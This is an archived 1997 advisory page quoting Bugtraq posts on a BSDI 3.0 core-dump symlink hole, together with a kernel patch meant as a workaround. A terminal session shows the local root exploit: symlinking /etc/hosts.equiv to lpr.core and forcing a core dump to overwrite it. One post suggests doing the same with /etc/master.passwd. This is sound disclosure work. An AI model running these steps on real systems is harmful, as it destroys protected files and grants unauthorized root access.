BSDI 3.0 symlink hole

Summary
Description:BSDI 3.0 apparently allows you to cause a code dump and the core file will overwrite what you symlink it to.
Author:Stacey Son <sson@ISERVER.COM> and Ariel Biener <ariel@FIREBALL.TAU.AC.IL>
Compromise: root (local)
Vulnerable Systems:BSDI 3.0, other versions don't seem to be affected.
Date:20 June 1997
Details


Date: Fri, 20 Jun 1997 20:53:16 +0300
From: Ariel Biener <ariel@FIREBALL.TAU.AC.IL>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Core file anomalies under BSDi 3.0

On Thu, 19 Jun 1997, Nir Soffer wrote:

[.snip.]
> A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
> program with priviliges isn't neccesary.
>
> B.) BSDi _does_ however, check if the file exists, so it's quite
> impossible to overwrite files.


Hmm, this is not my experience:

slingshot: {2} % id
uid=100(ariel) gid=20(staff) groups=20(staff), 0(wheel)
slingshot: {3} % ls -l /etc/hosts.equiv
-rw-------  1 root  wheel  0 Jun 20 22:43 /etc/hosts.equiv
slingshot: {4} % ln -s /etc/hosts.equiv lpr.core
slingshot: {5} % lpr
^Z
Suspended
slingshot: {6} % kill -ABRT %1
slingshot: {7} % fg
lpr
Abort (core dumped)
slingshot: {8} % ls -l /etc/hosts.equiv
-rw-------  1 root  wheel  167936 Jun 20 22:45 /etc/hosts.equiv
slingshot: {9} % su
Password:
Jun 20 22:46:34 slingshot su: ariel to root on /dev/ttyp0
slingshot: {1} % uname -a
BSD/OS slingshot.tau.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #0: Mon Jun 16
19:51:22 IDT 1997
root@slingshot.tau.ac.il:/usr/src/sys/compile/SLINGSHOT  i386

It wont work if the target file is *not* mode 0600 .

--Ariel

>
> C.) BSDi _does_ change the permissions of the core dump to 600, and it
> keeps on being owned by root, so changing the file is impossible as well.
>
> Regards,
> Nir.
>
> --
> Nir Soffer AKA ScorpioS, scorpios@cs.huji.ac.il .
> USER, n.:
>         The word computer professionals use when they mean "idiot."
>                 -- Dave Barry, "Claw Your Way to the Top"
>

   +---------------------------------------------------------+
   | Ariel Biener                                            |
   | e-mail: ariel@post.tau.ac.il        Work ph: 03-6406086 |
   +---------------------------------------------------------+

Date: Fri, 20 Jun 1997 17:17:25 -0600
From: Stacey Son <sson@ISERVER.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Core file anomalies under BSDi 3.0

[Stuff Deleted]

> A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
> program with priviliges isn't neccesary.

It seems BSDI broke this in 3.0.  BSD/OS 2.1 does not have this
problem as far as I can tell.  Below is a quick workaround until BSDI
comes out with something.  Apply the patch to kern/kern_sig.c.  A real
fix would require setting the P_SUGID flag in the exec handler in
kern_exec.c.

> B.) BSDi _does_ however, check if the file exists, so it's quite
> impossible to overwrite files.

Not exactly.  Try "ln -s /etc/master.passwd /tmp/lpr.core", for
example. :-0 It seems if the permissions are 0600 on the file you link
to it will overwrite the file.

Regards,

stacey@iserver.com

---snip--snip------------------------------------------------------------
*** kern_sig.c.orig     Tue Oct 15 12:23:05 1996
--- kern_sig.c  Fri Jun 20 16:26:08 1997
***************
*** 1198,1206 ****
         * Don't dump if not root and the process has used set user or
         * group privileges.
         */
!       if (p->p_flag & P_SUGID &&
!           (error = suser(p->p_ucred, &p->p_acflag)) != 0)
!               return (error);

        /* Don't dump if will exceed file size limit. */
        if (ctob(UPAGES + vm->vm_dsize + vm->vm_ssize) >=
--- 1198,1208 ----
         * Don't dump if not root and the process has used set user or
         * group privileges.
         */
!       if ((p->p_flag & P_SUGID || p->p_cred->p_ruid != p->p_ucred->cr_uid) &&
!           /*(error = suser(p->p_ucred, &p->p_acflag)) != 0)
!               return (error);*/
!           p->p_cred->p_ruid)
!               return EPERM;

        /* Don't dump if will exceed file size limit. */
        if (ctob(UPAGES + vm->vm_dsize + vm->vm_ssize) >=

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]